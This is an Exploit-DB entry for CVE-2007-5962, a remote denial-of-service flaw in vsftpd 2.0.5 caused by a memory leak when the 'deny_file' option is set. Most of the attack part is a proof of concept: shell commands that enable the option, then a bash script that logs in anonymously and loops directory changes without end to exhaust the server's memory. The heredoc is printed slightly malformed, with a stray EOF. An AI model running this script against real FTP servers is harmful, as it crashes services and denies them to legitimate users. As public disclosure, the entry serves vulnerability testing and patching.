vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)
Author: Martin Nagy
type: dos
platform: windows
port:
date_added: 2008-05-21
date_updated: 2016-12-07
verified: 1
codes: CVE-2007-5962;OSVDB-45626
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comvsftpd-2.0.5.tar.gz
source: https://www.securityfocus.com/bid/29322/info
The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf
# service vsftpd restart
$ cat > memtest.sh <<EOF
EOF
#!/bin/bash
echo USER anonymous
echo PASS foo@bar.com
while [ 1 ]; do
echo CWD pub
echo CWD ..
done
EOF